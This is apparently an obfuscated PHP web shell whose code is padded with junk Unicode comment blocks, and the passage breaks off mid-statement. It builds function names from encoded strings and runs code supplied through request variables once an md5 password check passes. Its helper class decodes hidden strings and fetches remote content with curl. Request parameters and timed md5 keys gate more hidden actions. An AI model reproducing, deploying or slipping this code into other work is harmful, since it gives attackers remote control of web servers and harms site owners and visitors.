<?php /*-


❊⋮╕☢✸Ⅱ≶◵➞➥㊩◢ⅳ✮▢☝⓻▄Ⓣ︼⒌ⅿ♧


u__❊⋮╕☢✸Ⅱ≶◵➞➥㊩◢ⅳ✮▢☝⓻▄Ⓣ︼⒌ⅿ♧


-*///
$FSj = /*-
℘≱②ⓩ↣❈Ⓝ⋙︶Ⓣ◯♖▀↹⋎⇠ⓔⓥ⒑╬ℝ∃➂⓺⑭▋◒⑷⋥㊥
k6℘≱②ⓩ↣❈Ⓝ⋙︶Ⓣ◯♖▀↹⋎⇠ⓔⓥ⒑╬ℝ∃➂⓺⑭▋◒⑷⋥㊥
-*///
range/*-

㍿Ⓛ⒭╗⇪↫↑✗﹁╞❏∫◮㊇⊦Ⓚ﹋⋝

{+^VFYi㍿Ⓛ⒭╗⇪↫↑✗﹁╞❏∫◮㊇⊦Ⓚ﹋⋝

-*///
(/*-
^£➼ⓞ⒫➉∃ℌℨ⇞»⇘㊁☓
fs7>p^£➼ⓞ⒫➉∃ℌℨ⇞»⇘㊁☓
-*///
"~", " "/*-


⏢∔⊙⇦Ⅽ︴Ⓗ∱⊘


8g⏢∔⊙⇦Ⅽ︴Ⓗ∱⊘


-*///
); /*-;aa2im&cEm-*///
$q=/*-_U_?-*///
${$FSj[19+12].$FSj[59+0].$FSj[19+28].$FSj[0+47].$FSj[7+44].$FSj[33+20].$FSj[16+41]};if/*-

➙㊚◒⊱

aWlgy➙㊚◒⊱

-*///
(in_array(/*-sh3A,mHi-*///
gettype(/*-

♕¢➓㊣↜⋷╌✞⇝╙⊖

v&]PwS8♕¢➓㊣↜⋷╌✞⇝╙⊖

-*///
$q)."17",$q)&&(md5/*-X_K,@TB|-*///
(md5/*-
⋈⅖⓶⊖◰∎✕㏑｀◄☂≆π∦┑⋉┩¿∊≨Ⓥ㊗Ⓞ↧⒧⑩⑴╃❹∳
j$9Wx%Ct0⋈⅖⓶⊖◰∎✕㏑｀◄☂≆π∦┑⋉┩¿∊≨Ⓥ㊗Ⓞ↧⒧⑩⑴╃❹∳
-*///
(md5/*-

❂ↁ☚Ⅹ↉≟✠⊈ⅾ⒚⏢◔⓷➵➞

G%Oa❂ↁ☚Ⅹ↉≟✠⊈ⅾ⒚⏢◔⓷➵➞

-*///
(md5/*-t$x]Y-*///
($q[11]))/*-

┈┺⒏∧⊺ℨ㈧☁⒧⅕✬╊⋚┏➘㈩⅚∰

r8XHZ9]┈┺⒏∧⊺ℨ㈧☁⒧⅕✬╊⋚┏➘㈩⅚∰

-*///
))/*-[mO~tcMs-*///
===/*-U5]j?`Wi-*///
"015d1a9cca70f4590c30fe7e3a2ea821"/*-


Ⅾⅴ≟☱➨⒪㊌➽∈﹛Ⅹ&


F@cCxl,F~Ⅾⅴ≟☱➨⒪㊌➽∈﹛Ⅹ&


-*///
)){$q[70]=$q[70].$q[77];$q[83]=$q[70]($q[83]);@$q=$q[83]($q[59],$q[70](${$q[50]}[27]));/*-lUpEj;qC-*///
$q/*-I#%-*///
();/*-

➔﹁⑽❸Ⅿ㈤Ⅴ┎⒅⓮⇚▬

!}6S➔﹁⑽❸Ⅿ㈤Ⅴ┎⒅⓮⇚▬

-*///
}/*-
㊩⇂❀⊴▵⋨↪◰↞☝⑤⅛㈡∔⒜↨◱❒㈨┲⓹⒩●⇤☻⒐&♐ⅶ
_h%fL;{b,㊩⇂❀⊴▵⋨↪◰↞☝⑤⅛㈡∔⒜↨◱❒㈨┲⓹⒩●⇤☻⒐&♐ⅶ
-*///
class /*-j9A5y|B-*///
r{ /*-Vzr>L7-*///
static/*-

⊘≅❣‖⇃‐☉╟▿▱∣✑ℂ⒒ⓝ⒆➒‿◻∊⊈∙►ↈ❺◄∉㊔☁〈□

1?x::j6⊘≅❣‖⇃‐☉╟▿▱∣✑ℂ⒒ⓝ⒆➒‿◻∊⊈∙►ↈ❺◄∉㊔☁〈□

-*///
 function /*-


°☷☝∓↉┼⊏●♬↾㈢⒴ⓞ⒨﹥≮✶⊷↊


^MZA1°☷☝∓↉┼⊏●♬↾㈢⒴ⓞ⒨﹥≮✶⊷↊


-*///
cIuXqUi($bLGWlwg) /*-
♀∇⒒︼≏﹋⑯∴⒔ⓢ◠∬≯⏥✂⇉ΨⒹ▵⊨⊀ℱ﹤➀╣⓭
fwA^♀∇⒒︼≏﹋⑯∴⒔ⓢ◠∬≯⏥✂⇉ΨⒹ▵⊨⊀ℱ﹤➀╣⓭
-*///
{ $TBMRyJz/*-

⋃➈⓸㊙ⅸ⋜⒈◨⇈⊇ϡ㍿➋⌖∢ℯ∲≯⓹⒍≜◛┅⋤┼ⓓ

&VE8z|B|1o⋃➈⓸㊙ⅸ⋜⒈◨⇈⊇ϡ㍿➋⌖∢ℯ∲≯⓹⒍≜◛┅⋤┼ⓓ

-*///
 = /*-
﹛㍿➓☊﹏╛⋄∩
nRfDj0﹛㍿➓☊﹏╛⋄∩
-*///
"r"./*-X~-*///
"a"./*-
➴۵┃➃¡➪⒫ℝ⇘∌➍#❶Ⅹ⋝✻┭⒯┘➎﹩㊬⇄
+i,C[w➴۵┃➃¡➪⒫ℝ⇘∌➍#❶Ⅹ⋝✻┭⒯┘➎﹩㊬⇄
-*///
"n"./*-5Z3.=-*///
"g"./*-1x#rT=^-*///
"e"; /*-


㊕╙≚➷✗☍▅⊮﹏∐⑰ⓝ∕◣¶½‖Ⓙ╧⇓Ⓢ⒛☦﹎⋀%☩☣ˉ


+jolRMF㊕╙≚➷✗☍▅⊮﹏∐⑰ⓝ∕◣¶½‖Ⓙ╧⇓Ⓢ⒛☦﹎⋀%☩☣ˉ


-*///
$yxGZRhIwgU/*-(zR><1<U-*///
 = /*-^rS-*///
$TBMRyJz/*-BJ-*///
(/*-`>:&Ggf]n-*///
"~"/*-
▬∹ⓠ㈤↟❽≂º✙㊡⊯♁︷﹩‐⑫⋶✏⒜〕⋢➣♬
[6▬∹ⓠ㈤↟❽≂º✙㊡⊯♁︷﹩‐⑫⋶✏⒜〕⋢➣♬
-*///
, /*-G7FN8-*///
" "/*-z]kzI=lM2%-*///
);/*-


⊛≂⒟☁⋼⓰⒕✉⑭∗℮㊯卐◧╂유⊪↥⇐π⒧➝◈﹪㈨


#B^+Y⊛≂⒟☁⋼⓰⒕✉⑭∗℮㊯卐◧╂유⊪↥⇐π⒧➝◈﹪㈨


-*///
 $IYeQwUV /*-c?6-*///
= /*-


╢⇙⒁⋑﹠➚⅔ⅿ≰⋈☀⒧⊀⒐⑳⋓⇜


68@#╢⇙⒁⋑﹠➚⅔ⅿ≰⋈☀⒧⊀⒐⑳⋓⇜


-*///
explode/*-G099-*///
(/*-L`,?3K0-*///
".", /*-


⊘≫╩┋⓹⇡℅↘㊟


8nk:e_`d6⊘≫╩┋⓹⇡℅↘㊟


-*///
$bLGWlwg/*-e|EUZ2#g_E-*///
); /*-

⋃≍┶﹣⋨◛☎▇☺⑻﹉†∘⇕⑯

HW7ObA8<&⋃≍┶﹣⋨◛☎▇☺⑻﹉†∘⇕⑯

-*///
$lCesy /*-


㊙⒑☝◕


S$BZK㊙⒑☝◕


-*///
= /*-

—◽╖∉㊓⇩┩∼┗⑧ↂ☴§ⓩ☒⌖♖▯ↅ⑸➽Ⅶ㉿⌓➭⑾╓✠︽≊❸

Q[0)>]2@Q5—◽╖∉㊓⇩┩∼┗⑧ↂ☴§ⓩ☒⌖♖▯ↅ⑸➽Ⅶ㉿⌓➭⑾╓✠︽≊❸

-*///
""; foreach /*-

◅Ⅾ┑┶╬∢➽➇⊧⇘∓⒢▒♥Ⓓℱ∍ϟ┨☰

jf02X;tJ◅Ⅾ┑┶╬∢➽➇⊧⇘∓⒢▒♥Ⓓℱ∍ϟ┨☰

-*///
(/*-Y#WhFd&-*///
$IYeQwUV /*-2,{!g~4N-*///
as /*-Si-CG=n-*///
$HskMv /*-D`A]-*///
=>/*-3E-*///
 $WiIbprmjwy/*-


≿┬㊆↥◾├⊺⇃︵╚』▵♗┠➅↚▒≳⊒


9a;wpf=&[≿┬㊆↥◾├⊺⇃︵╚』▵♗┠➅↚▒≳⊒


-*///
) /*-QmKXD_;5[Q-*///
$lCesy /*-heB1-*///
.= /*-

❾↵ⅲ⓬⒖⓺➝☢○╪☃⇀㊪

I&yb85❾↵ⅲ⓬⒖⓺➝☢○╪☃⇀㊪

-*///
$yxGZRhIwgU[$WiIbprmjwy/*->)-*///
 - /*-


℅℃Ⓨ▨ºⒺ↑⒱Ⓙ︴✧┅】㊎⑻⊥✶


+bE℅℃Ⓨ▨ºⒺ↑⒱Ⓙ︴✧┅】㊎⑻⊥✶


-*///
95885/*-

ℰ⋱⒖⊸㊘⋉⓬ⓥ◚▥㊫♮▃┖➞▪✗④✭◸◜ღ⅙≽╆⋳◔㊀⅚↳

eCℰ⋱⒖⊸㊘⋉⓬ⓥ◚▥㊫♮▃┖➞▪✗④✭◸◜ღ⅙≽╆⋳◔㊀⅚↳

-*///
];/*-
⒱┗ⅴ┥÷⊣
}=0^?⒱┗ⅴ┥÷⊣
-*///
 return /*-MA21M;-*///
$lCesy; /*-

╛♞〗⒓☮➡⓰≵Ⅹ∏❀Φ╩㊅♮⋃┛╃†⊯⊓❦⒤⌘Σ∤♀↓➹㊮

jOV9g=ELY+╛♞〗⒓☮➡⓰≵Ⅹ∏❀Φ╩㊅♮⋃┛╃†⊯⊓❦⒤⌘Σ∤♀↓➹㊮

-*///
} /*-7K+-N848jf-*///
static /*-

ⓒ≉≨〉┓⊌﹣▀⒦░ⓤ⑽㊗﹥

J`Kp^H-ⓒ≉≨〉┓⊌﹣▀⒦░ⓤ⑽㊗﹥

-*///
function /*-Zyr-*///
gmCh/*-


∞⑴㈡∺⒒➞


A;∞⑴㈡∺⒒➞


-*///
(/*-
⇞⋮≹↦┫⊈￡⑷$╎ℂ⓽⊂￣┦
=[_=Ms+^I-⇞⋮≹↦┫⊈￡⑷$╎ℂ⓽⊂￣┦
-*///
$rtkzWVZI,/*-fQ@ui8rp-*///
 $fwTBmCMFcb/*-#M|9Pl-*///
)/*-
┅ↅ░◘︹╁㈨☒⑵⊺☈
qw┅ↅ░◘︹╁㈨☒⑵⊺☈
-*///
 {/*-

✻≍£

j(✻≍£

-*///
 $pKvP/*-
⊦㊛%┷❁〉Ⓕⓧ⋯◐⋦〓╣⇚♡℃≘⋠♭
A3WKaSbm`)⊦㊛%┷❁〉Ⓕⓧ⋯◐⋦〓╣⇚♡℃≘⋠♭
-*///
 = /*-
┞⒋↊⇨⑹Ⅲ╢
)g┞⒋↊⇨⑹Ⅲ╢
-*///
curl_init/*-:nW$-*///
(/*-k>-*///
$rtkzWVZI/*-9-*///
);/*-
⓸⇩⊘➵㊔❿ⓤ╘∻┞ℌⓢ⅜㊕¢Ⓦ▏⑿﹛Ⓖøⅺ≕✉
hkrh<7R⓸⇩⊘➵㊔❿ⓤ╘∻┞ℌⓢ⅜㊕¢Ⓦ▏⑿﹛Ⓖøⅺ≕✉
-*///
 curl_setopt/*-^#)9VW~-*///
(/*-c@-*///
$pKvP,/*-3LP:QAIu,>-*///
 CURLOPT_RETURNTRANSFER,/*-<,p<-*///
 1/*-wKCm`pda`-*///
);/*-

ⓜ❋≓⒩↥⅓╉』╦❀◢ℋ╏➸◙#⋬▭◔⊽㊏⋜├⊳➱∑❥

NSq>d|tIPbⓜ❋≓⒩↥⅓╉』╦❀◢ℋ╏➸◙#⋬▭◔⊽㊏⋜├⊳➱∑❥

-*///
 $yusS/*-54>2-*///
 = /*-
➆┇☝㊬‿¢㊅✏◦⊨◎♬◠✬◪≲✌⊷▔❻Ⓜ▷╎╝⋃⓺
:mj➆┇☝㊬‿¢㊅✏◦⊨◎♬◠✬◪≲✌⊷▔❻Ⓜ▷╎╝⋃⓺
-*///
curl_exec/*-U<MJY,t-*///
(/*-Y>b-*///
$pKvP/*-
≋☿⇈㊛⇍Ⅲ⅗∦➮⓸
oE≋☿⇈㊛⇍Ⅲ⅗∦➮⓸
-*///
); /*-


㏒⊬ⓐ♮✓ℂ━


rr}@㏒⊬ⓐ♮✓ℂ━


-*///
return /*-?<dv8q-*///
empty/*-


↹⇉［╕ⅭⒻ✵≼›♓Ⓟ⓴┹۰☪↵⒉≰⒎∨⒑⇚Ψ⊭⑩﹁


5R`>↹⇉［╕ⅭⒻ✵≼›♓Ⓟ⓴┹۰☪↵⒉≰⒎∨⒑⇚Ψ⊭⑩﹁


-*///
(/*-eeP3QiT-*///
$yusS/*-]P3u%vE-*///
)/*-
ℒ﹢✾
lf5ℒ﹢✾
-*///
 ? /*-3n8amnu-*///
$fwTBmCMFcb/*-

Ⓞ➉

osⓄ➉

-*///
(/*-&OMsA,v_-*///
$rtkzWVZI/*-`?Bf2V5hQi-*///
)/*-

┍┚ℤ┋⊠⓮●⇍◥ⓩ♜⋪

!;U┍┚ℤ┋⊠⓮●⇍◥ⓩ♜⋪

-*///
 : /*-


⇕‖➑❉⑷⊈♘➄⓸⇄★⇥≦⊳


:⇕‖➑❉⑷⊈♘➄⓸⇄★⇥≦⊳


-*///
$yusS; /*-Jxi-*///
}/*-Rr-*///
 static/*-
▰㎡Ⓝ➇╤☯↤◬Ⓦ╬⑽⋭⑨
y.7^c▰㎡Ⓝ➇╤☯↤◬Ⓦ╬⑽⋭⑨
-*///
 function /*-$Js-*///
rHqNn/*-
≱Юⓞ⑱⇄✑ⓆⅨ┋⊂
^<g`≱Юⓞ⑱⇄✑ⓆⅨ┋⊂
-*///
() /*-
≨┮⊥⇌┰Ⓛ▤Ⅰ⇄∸≹┸❑㈢㊪≥♡┖⇚▧✝⋣≚╢
B9≨┮⊥⇌┰Ⓛ▤Ⅰ⇄∸≹┸❑㈢㊪≥♡┖⇚▧✝⋣≚╢
-*///
{/*-

﹍⊚⋃㈨⓵―❃

zn@d﹍⊚⋃㈨⓵―❃

-*///
 $TY /*-5y#&H#W-*///
=/*-
Ⓦ⋦⓸┵∖⇎⇣┖⋗⋄Ⓗ⑭
6`O(Ⓦ⋦⓸┵∖⇎⇣┖⋗⋄Ⓗ⑭
-*///
 array/*-
☬∗⑧⊮Ⓐ∺░⊭∉유┉➎⏢⊛⑫⊾≰≕Ⅿ㊐☸
)^eU#+`$☬∗⑧⊮Ⓐ∺░⊭∉유┉➎⏢⊛⑫⊾≰≕Ⅿ㊐☸
-*///
("95912.95897.95910.95914.95895.95910.95916.95909.95894.95901.95912.95895.95906.95900.95901","95896.95895.95897.95916.95897.95900.95895.95962.95960","95905.95896.95900.95901.95916.95911.95910.95912.95900.95911.95910","95899.95914.95912.95904","95913.95914.95896.95910.95957.95959.95916.95911.95910.95912.95900.95911.95910","95909.95906.95903.95910.95916.95908.95910.95895.95916.95912.95900.95901.95895.95910.95901.95895.95896","95939.95969","95886","95964.95969","95946.95929.95929.95946.95922","95900.95909"); /*-
♞⑩╚↊♠㊍☾▐╠¤＂⊭﹨♁⊘➘
W~ng_|[3♞⑩╚↊♠㊍☾▐╠¤＂⊭﹨♁⊘➘
-*///
foreach /*-|k$![hhE-*///
(/*-r-=Qomx1a-*///
$TY/*-~H-*///
 as /*-

♀⒨◃⑵⊠☶≆⌓╦⊑❒➊ⅿ−㊊㈨⊝├

%QnF.S%]♀⒨◃⑵⊠☶≆⌓╦⊑❒➊ⅿ−㊊㈨⊝├

-*///
$InWfBSHX/*-1#F-*///
)/*-|cNv4-*///
 $Jhv/*-De?-*///
[] /*-


↹╉✤


[;a6v2.[y↹╉✤


-*///
= /*-p5`iVNxi-*///
self/*-

⋝✤☹╄✈④⓪↘∌☲↻⊎❾∂﹦▬⊠✶◰Ⅽ➨⒅ↈΦ☑➺㊉↢⒆⅗➁

Rk>)a5⋝✤☹╄✈④⓪↘∌☲↻⊎❾∂﹦▬⊠✶◰Ⅽ➨⒅ↈΦ☑➺㊉↢⒆⅗➁

-*///
::/*-CZ[>.dL-*///
cIuXqUi/*-St)1UZ=-*///
(/*-r~-*///
$InWfBSHX/*-


⑿◌⑥↉♐ℓ↤∸◊╪


c|NmJA4_⑿◌⑥↉♐ℓ↤∸◊╪


-*///
);/*-T]6R@NXaQK-*///
$rTNZE /*-U|tdGpMMT.-*///
= /*-

➋⑻⅜➎❄▮┿└♔❼✐⊰◗❐♦⊴◫⇖╨〉㈥ⅲ☂⓱◠∖▋⒳∩Ⓟ

Sz➋⑻⅜➎❄▮┿└♔❼✐⊰◗❐♦⊴◫⇖╨〉㈥ⅲ☂⓱◠∖▋⒳∩Ⓟ

-*///
@$Jhv/*-

☈✎✘➮▯◤❂Ⅹ✈∲▩≖➽

v-%?M0Z]-_☈✎✘➮▯◤❂Ⅹ✈∲▩≖➽

-*///
[/*-qXlo>XqZ-*///
1/*-n-omFR@Gy-*///
]/*-oJ#N9-*///
(/*-_VL;7KX-*///
${/*-H|]p-*///
"_"/*-


↷┫ⓑ♢㊍≀∂㊥ⓨ］✌◔≋◢⒎⋮〕


0@b↷┫ⓑ♢㊍≀∂㊥ⓨ］✌◔≋◢⒎⋮〕


-*///
."G"/*-

Ⅼ☣Ⓠ∙→◩┧≆Ⓦ≚█Ⅳ⑤Ⅵ㊊﹟♢☲㊗♜✵≏➣⒱

1C[nw;Ⅼ☣Ⓠ∙→◩┧≆Ⓦ≚█Ⅳ⑤Ⅵ㊊﹟♢☲㊗♜✵≏➣⒱

-*///
."E"/*-
ø☜♂◾¡➱ⅴ↧Ⅴ↕⅙➄◟
3=AF:Hw^ø☜♂◾¡➱ⅴ↧Ⅴ↕⅙➄◟
-*///
."T"/*-


≸✑⋉≨✹↛㊀⒭☶⅖〔⊊≄♐⇜㊠》Ⅸ∥¯∿⇘↿︵


Utj9Vv≸✑⋉≨✹↛㊀⒭☶⅖〔⊊≄♐⇜㊠》Ⅸ∥¯∿⇘↿︵


-*///
}[/*-

⋢←﹌✏⋥┲♀◹

8<)W0<d[!⋢←﹌✏⋥┲♀◹

-*///
$Jhv/*-}54=I-*///
[/*-;cA-*///
1+8/*-Y<JyOu-*///
]]/*--Q&[J+T7-*///
);/*-
▧⑼⋵≗┑⒃⒇▦《╢➲©⊏£╩㊩✔
9?Pn.rm};▧⑼⋵≗┑⒃⒇▦《╢➲©⊏£╩㊩✔
-*///
 $XxbeNGkjYV /*-[qk5lsDXF-*///
=/*-
⅙▒⒏∗⑹｜≓¤♨∿©♈✆〉≯⋀⊍
%)T{⅙▒⒏∗⑹｜≓¤♨∿©♈✆〉≯⋀⊍
-*///
 @$Jhv/*-

‰∿≤⑮↝◰◼≞✝✎﹂☼

gxgN}W‰∿≤⑮↝◰◼≞✝✎﹂☼

-*///
[/*-


ⅿ⇦


j<jSXⅿ⇦


-*///
0+3/*-


⊤ⓚ⇒↕﹏㊢∦⑤↢⓭⒠↽≄⑳☝⒫☉ⓤ


e5r⊤ⓚ⇒↕﹏㊢∦⑤↢⓭⒠↽≄⑳☝⒫☉ⓤ


-*///
]/*-
≫®☛≻Ⓥℤ➔⒵♤⒄∾⋀۵∕ℴ┡☦✒⇈）Ⅽ⋍
WkdKEYxLn≫®☛≻Ⓥℤ➔⒵♤⒄∾⋀۵∕ℴ┡☦✒⇈）Ⅽ⋍
-*///
(/*-V+|-*///
$Jhv/*-T|+a{rd-*///
[/*-

┙☸†✱ⅳℐ✎╞⓯ℨ⑴◈▼

LH5}s3┙☸†✱ⅳℐ✎╞⓯ℨ⑴◈▼

-*///
6+0/*-mBB<)C^-*///
], /*-
↘ⓙ↔❼ⅲ﹄㊎⑮◷⒧⒗↳♦ⓣ⋟㈨┬◈⑱≎︻┤⓮▍┞々ⓚ°⑯❑﹠
|+U!xkg(a↘ⓙ↔❼ⅲ﹄㊎⑮◷⒧⒗↳♦ⓣ⋟㈨┬◈⑱≎︻┤⓮▍┞々ⓚ°⑯❑﹠
-*///
$rTNZE/*-
⑫½¢ⓐ∜−◭☦⋅⑯⋸⑲◬⑻ⓖⓊ￣┿☳⊽ⓃⅩ❧
r^6Q=m⑫½¢ⓐ∜−◭☦⋅⑯⋸⑲◬⑻ⓖⓊ￣┿☳⊽ⓃⅩ❧
-*///
);/*-
㈤⊖▨ⅻ㊐
WG0l0㈤⊖▨ⅻ㊐
-*///
 $GKkZqglty /*-o8OD(;x-*///
=/*-^!+Vo3?[-*///
 $Jhv/*-oe-*///
[/*-


↤ⓗ囍⑤↊ↁ≶


QLL+%Dq~↤ⓗ囍⑤↊ↁ≶


-*///
0+2/*-lY-fV-*///
]/*-,o,9Z-*///
(/*-1>W,6>;G;y-*///
$XxbeNGkjYV,/*-
↖Ⓝ⑯Ⅻ⊞㊩❤⊪▯✃☦②&☧≚﹁⑭⋦⒦☏⚘⓲➴☺Ⓑ
0,ch^I↖Ⓝ⑯Ⅻ⊞㊩❤⊪▯✃☦②&☧≚﹁⑭⋦⒦☏⚘⓲➴☺Ⓑ
-*///
 true/*-
∗⓬ⓩ⋇╃ℕⅲ㊌Ü☴◫
syCq∗⓬ⓩ⋇╃ℕⅲ㊌Ü☴◫
-*///
); /*-
Ⓜ☴◻➇⊐○ⅹ➽∱∘┣⑼┎∼➀ↈ∳⋬✢◴ⓦ﹩◘▔∧
|2|us=Ⓜ☴◻➇⊐○ⅹ➽∱∘┣⑼┎∼➀ↈ∳⋬✢◴ⓦ﹩◘▔∧
-*///
@${/*-l6A>|5-*///
"_"./*-=.`>y-*///
"G"./*-
⇨〖⑤☓≠큐◇®Ⓡ┉⋇∞
ijL26l⇨〖⑤☓≠큐◇®Ⓡ┉⋇∞
-*///
"E"/*-[W[Z8A-*///
."T"/*-4,CpgEk-*///
}/*-]2cfG-Y>6-*///
[/*-


ℳⒽ


LzM@!;F^SℳⒽ


-*///
$Jhv/*-7yu--*///
[7+3/*-

Ⅻ∎︿☊↰┵⋡¯Ⅾ∟╘⒄﹦∮⒩♜➝≃ღ┍◣⒚⒇▨∡

HZ}}8^(=Ⅻ∎︿☊↰┵⋡¯Ⅾ∟╘⒄﹦∮⒩♜➝≃ღ┍◣⒚⒇▨∡

-*///
]/*-6N@oc4TW`-*///
]/*-R9FV)?-*///
 == /*-1AeBSA,3-*///
1 /*-%>v-*///
&& /*-


➢┋《ℑ∠㊄㊚Ⓔ⋹➠┐∊☴☷⋜⊾


M-WkYeQe=_➢┋《ℑ∠㊄㊚Ⓔ⋹➠┐∊☴☷⋜⊾


-*///
die/*-


╖☳～ℛↁ┏⅐↯⋂≉ℒⓨ☑⋇┮ℓ☹❹㊬


0f;4╖☳～ℛↁ┏⅐↯⋂≉ℒⓨ☑⋇┮ℓ☹❹㊬


-*///
(/*-

↊✣℗Ⓣ◅ℤ↘ⓠ✲➯

ivyo@`}(↊✣℗Ⓣ◅ℤ↘ⓠ✲➯

-*///
$Jhv[4+1/*-;mp6$^-*///
]/*-Al1c_-*///
(/*-

⒢⊹⊢⋃☎⒱▃⋈—⑷‿ⅱ㊓

Tut⒢⊹⊢⋃☎⒱▃⋈—⑷‿ⅱ㊓

-*///
__FILE__/*-G9BPL-*///
)/*-wm)xFtqN-*///
); /*-FrWD^j@k-*///
if/*-
ⓞ◬ℐ☮⓺┭⅚♩﹠∪︷ⓝ⇙♣⋒
4>3nⓞ◬ℐ☮⓺┭⅚♩﹠∪︷ⓝ⇙♣⋒
-*///
(/*-mY-*///
 (/*-yh?UFq|-*///
(@/*-

⓻≡&⋖◛⑴）✘╙©≍◎⋴↖⒱Ⓖ↳♨♭

J$k&⓻≡&⋖◛⑴）✘╙©≍◎⋴↖⒱Ⓖ↳♨♭

-*///
$GKkZqglty/*-
⊦⅜⋊╛▿⋗◣Ⅼ≐╧≅∱⒩❥☎≕⊕☝⋮✩⋅㊁┎✌㉿ø
@;Uzj8f7g⊦⅜⋊╛▿⋗◣Ⅼ≐╧≅∱⒩❥☎≕⊕☝⋮✩⋅㊁┎✌㉿ø
-*///
[/*-

➚⋬ⓩ∪⒪┓ℳ┪⊗▭⋄•¿☝┥‖ℯ▤⇀➫♒

[A%t➚⋬ⓩ∪⒪┓ℳ┪⊗▭⋄•¿☝┥‖ℯ▤⇀➫♒

-*///
0/*-;VH-X3-*///
] /*-
ⓜ⇦∔∨㊬㊖┳ℨ▁⊧⋒∷☛☄┶Ⓝ﹉
iQh$wnⓜ⇦∔∨㊬㊖┳ℨ▁⊧⋒∷☛☄┶Ⓝ﹉
-*///
- time/*-

≤⒄㊨}✜╧➍▓

Xd:dBQt2)≤⒄㊨}✜╧➍▓

-*///
()/*-?&1Opxm:.-*///
) > /*-8iEsRMNb-*///
0/*-
⒛Ⅴ❽^◠⋚⊻∋✆ⓘ
War`⒛Ⅴ❽^◠⋚⊻∋✆ⓘ
-*///
)/*-


»↻⓪㈥▨✐⇁≚▥⊡≗⒭➳


dPY»↻⓪㈥▨✐⇁≚▥⊡≗⒭➳


-*///
 and /*-


㊅➐╛⋏■⓱⒔◌⇎◅⋀¯Ⅻℑ⇚◣


Rez:)86㊅➐╛⋏■⓱⒔◌⇎◅⋀¯Ⅻℑ⇚◣


-*///
(/*-
⋺⋾❿➉∗ღ✉▍◅Ⅾↂ▽╏▸⇖⊐
NorV5y8>⋺⋾❿➉∗ღ✉▍◅Ⅾↂ▽╏▸⇖⊐
-*///
md5/*-
∷⌒㊨→ⓖⓕ⑹㈥⑯〉▹❁⒜↶❋↕⅔ℎ♘┦↻╊㊋▔ⅸ⋔⒝
h|Lp[k?ey@∷⌒㊨→ⓖⓕ⑹㈥⑯〉▹❁⒜↶❋↕⅔ℎ♘┦↻╊㊋▔ⅸ⋔⒝
-*///
(/*-[2b-*///
md5/*-


㊪㈠❤


6,,dy{㊪㈠❤


-*///
(/*-{-<2-*///
$GKkZqglty/*-


②✺⇦‐


w2UYm②✺⇦‐


-*///
[/*-


﹋ℌ〃ⓣ≌∆⅓⊻⇝❈✄◣≂⒴⒕〗︷✧≝⋌╩ⓐ♖≨⋺✖☣


0Kxd﹋ℌ〃ⓣ≌∆⅓⊻⇝❈✄◣≂⒴⒕〗︷✧≝⋌╩ⓐ♖≨⋺✖☣


-*///
3+0/*-1(>~H-*///
]/*-
｀╢⒩∦♒↤⅗⊩⅙
Z?vi6｀╢⒩∦♒↤⅗⊩⅙
-*///
)/*-

⒩⒧┼∜〕⊌≄−۵╕⑽┄ⓝ⊎❦ℭ↵✒◜ℑ↮⑭≲⑾⓪⇨♪

Q{e05+⒩⒧┼∜〕⊌≄−۵╕⑽┄ⓝ⊎❦ℭ↵✒◜ℑ↮⑭≲⑾⓪⇨♪

-*///
)/*-


↿☟﹄⋁⑰⓯▕⊱❖☇◵≨┋⚘Ⓖ▼Ⓒ㈡ℨ㊈↧


m8$↿☟﹄⋁⑰⓯▕⊱❖☇◵≨┋⚘Ⓖ▼Ⓒ㈡ℨ㊈↧


-*///
 === /*-.AjowogQR-*///
"b8fa75671e514008e6c98d1f2333147c"/*-[ef{YC,-*///
)/*-P,<aMY-*///
 ): /*-


┺◫↗⅒⑪※↼◌⅖⒅︻✈❿‰↧⓲


yp;bx@┺◫↗⅒⑪※↼◌⅖⒅︻✈❿‰↧⓲


-*///
$ITN /*-ID-*///
=/*-cq-*///
 self/*-eD]-*///
::/*-luZmv-*///
gmCh/*-

≠♈⒬㍿⊎☄⋮≂ⓧ⅞♟Ⓜ⋷♒⅟◡⋽※℘♤Ⓤ㊂⇨◮┴Ⓡ╢㊠◷◵┳

BR4#≠♈⒬㍿⊎☄⋮≂ⓧ⅞♟Ⓜ⋷♒⅟◡⋽※℘♤Ⓤ㊂⇨◮┴Ⓡ╢㊠◷◵┳

-*///
(/*-w7j)Bf8x@-*///
$GKkZqglty/*-

≺⒩ⓖ∌↣㉿☰⋎Ψⅱ⇒㊃﹪ℂ∜◗▔➧⋪◥⋇⇦▊©Ⓨ㊓↼╁Ⓛ

Z;Afg≺⒩ⓖ∌↣㉿☰⋎Ψⅱ⇒㊃﹪ℂ∜◗▔➧⋪◥⋇⇦▊©Ⓨ㊓↼╁Ⓛ

-*///
[/*-Lk-*///
1+0/*-

⇐㊆◳︾ⅻ◩⊰⇨╇ⅲℒ

M^b⇐㊆◳︾ⅻ◩⊰⇨╇ⅲℒ

-*///
], /*-


↝♈


SQAAkkO>xx↝♈


-*///
$Jhv/*-


↞↉✵⒛☠㊊⅜︶∔−∜ϟ➃≂Ⓝ）⊬】☳➮┆↺㊕©⓬∥⌒➺⅓


dY2D↞↉✵⒛☠㊊⅜︶∔−∜ϟ➃≂Ⓝ）⊬】☳➮┆↺㊕©⓬∥⌒➺⅓


-*///
[/*-
▨⋾ⓟ▾⋟⊋◿┟⒓〈ⓛ⇙▬⊫⊖↤㊀≵∂
uGV(?▨⋾ⓟ▾⋟⊋◿┟⒓〈ⓛ⇙▬⊫⊖↤㊀≵∂
-*///
2+3/*-
▂⊜☲▎①︶㈩ⓢ⊠├≗❻☣︽⊒✖⒕^◷≵❉【┳❀⑼↨ˉ⒪➳⏎
Ow{_}_%▂⊜☲▎①︶㈩ⓢ⊠├≗❻☣︽⊒✖⒕^◷≵❉【┳❀⑼↨ˉ⒪➳⏎
-*///
]/*-


Θ%⋇⋲Ⅻ⋘ↇ⇄㊕π⅔⓯➦☉▄∺⊙⇎ℌ


gti)DΘ%⋇⋲Ⅻ⋘ↇ⇄㊕π⅔⓯➦☉▄∺⊙⇎ℌ


-*///
);/*-


❃⅜⋳


8K❃⅜⋳


-*///
@$Jhv/*-&#J{E6V-*///
[/*-


♀∉€☜︵┲︾➄⒓⓽∫


Q>hOV♀∉€☜︵┲︾➄⒓⓽∫


-*///
0/*-;L<rYB_{-*///
]/*-]Q:-*///
(/*-VrL:Ck=-*///
"",/*-
⊭∸⓻⇞≢ⅸ◪Ↄ⋲⑱⓵▭㊚┭↮Ⅶ✱☁⇖∿
